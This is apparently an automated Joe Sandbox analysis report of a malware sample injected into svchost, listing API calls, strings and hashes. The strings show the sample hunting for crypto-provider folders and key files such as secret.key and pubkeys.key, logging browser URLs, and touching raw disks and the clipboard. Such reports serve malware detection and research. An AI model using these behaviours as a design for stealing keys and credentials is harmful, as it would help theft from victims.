                                                                                                                                                                                                                      • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(7F1BF93B,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C923E6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF93B$DefaultPrivateDir$General$STF$interpro.ini
                                                                                                                                                                                                                    • API String ID: 2256374885-467714554
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C9BE6A
                                                                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,Desk,?,00000000), ref: 02C9BF52
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(Desk,00000000), ref: 02C9BFC9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirstFolderPathSpecialmemset
                                                                                                                                                                                                                    • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                    • API String ID: 1415333704-2295261572
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,76229300), ref: 02C820FB
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandle$CloseCreateCurrentDirectoryDriveInformationTypeWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                                    • API String ID: 1874144376-3292898883
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                                    • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                                    • API String ID: 776485234-1938657081
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,?), ref: 02C7863B
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 02C7864A
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C78661
                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 02C78669
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 02C78676
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C78681
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 02C78687
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 02C78690
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 02C78696
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyErrorFreeLastLockOpenUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4128149074-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • setsockopt.WS2_32(?,00000006,00000001,02C98817,00000004), ref: 02C9E737
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: setsockopt
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3981526788-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C9116E
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91193
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02C911A5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamememset
                                                                                                                                                                                                                    • String ID: \clmain.exe
                                                                                                                                                                                                                    • API String ID: 350293641-582869414
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C9C3F9
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C9C43E
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 02C9C4B2
                                                                                                                                                                                                                    • free.MSVCRT ref: 02C9C4DF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2496910992-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F1D0
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfddb), ref: 02C8F1F7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F235
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F23F
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F247
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F259
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F260
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8F29C
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8F2AA
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfddb,?,?), ref: 02C8F2E5
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F31F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F329
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F331
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F340
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F347
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8F375
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8F3A0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F3EB
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02C8F405
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F448
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02C8F462
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,02CB854C,00000002), ref: 02C8F487
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F4CA
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02C8F4E4
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02C8F509
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C8F540
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F543
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F550
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F553
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02C8F562
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8F573
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8F57A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32 ref: 02C8F58E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8F5A0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02C8F5CD
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F5D0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F5DD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F5E0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02C8F5E9
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F5EC
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F5FD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F600
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
                                                                                                                                                                                                                    • String ID: 7f1bfddb$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                                    • API String ID: 3271848171-2785687885
                                                                                                                                                                                                                    • Opcode ID: 9e9a589f59627213d390dea9d56c8f8a65815f6c6738a9538559d0f58d6135f8
                                                                                                                                                                                                                    • Instruction ID: edd937d9dd211fdf14849e06959a517aaf84cf3747b41e19b0852adfee06e489
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9a589f59627213d390dea9d56c8f8a65815f6c6738a9538559d0f58d6135f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C13771A44385AFE722AF74DC49BAB7BE8EF85708F448A5CF54987140DB70D608CBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02C7F8A1
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F8A4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F8BE
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02C7F8DE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F8FF
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F902
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F917
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C7F92D
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F949
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F95C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02C7F96C
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F96F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F98A
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02C7F99D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F9E9
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F9EC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7FA00
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7FA10
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7FA1E
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7FA60
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA8C
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FA8F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA9C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FA9F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAAB
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FAAE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FABB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FABE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAD4
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FAD7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAE4
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FAE7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C7FB06
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FB0F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB18
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FB1B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB27
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FB2A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB33
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FB36
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                                    • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                                    • API String ID: 1808236364-2343086565
                                                                                                                                                                                                                    • Opcode ID: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
                                                                                                                                                                                                                    • Instruction ID: 79b30ae1e4b622c55ed223cae5a6f65302ab7b872334e227b12909a26e2ec0b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9A1E471D40219ABDB11DFA89C89FEFBBB8EF84714F048549F904A7280DB709E05CBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA1A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA28
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000001,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA35
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAA7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAB7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAC7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\crypto pro\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAD7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAE7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\temporary internet files\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAF7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,:\users\public,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB07
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,02CB81F4,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB17
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB23
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cryptokit\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB33
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB3F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B260,?,00000000,00000000), ref: 02C8CB62
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                    • String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
                                                                                                                                                                                                                    • API String ID: 2422867632-4225811205
                                                                                                                                                                                                                    • Opcode ID: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
                                                                                                                                                                                                                    • Instruction ID: f957749078c1dfe3f2d110b89996cccc822d6fa633d1d0f0118c3aedab972dff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB417271A8172675FA2AB6359C89FBB5E9C8ED09DCF108533FC06E2005EB74C70585B1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000002,7622F570,?,?), ref: 02C87AA3
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C87AAA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C87ABE
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,?), ref: 02C87ADB
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 02C87AEC
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87AFD
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87B10
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41), ref: 02C87B3D
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,7F1BFF41), ref: 02C87B4B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41), ref: 02C87B56
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87BB8
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87BCB
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C87BFD
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,7F1BF8F3), ref: 02C87C0B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C87C16
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90BE0,00000000,00000000,00000000), ref: 02C87C71
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87C90
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87CA3
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C87CCF
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,7F1BF93B), ref: 02C87CDD
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C87CE8
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C92320,00000000,00000000,00000000), ref: 02C87D43
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C87D5B
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C87D6C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D7B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C87D7E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D8B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C87D8E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
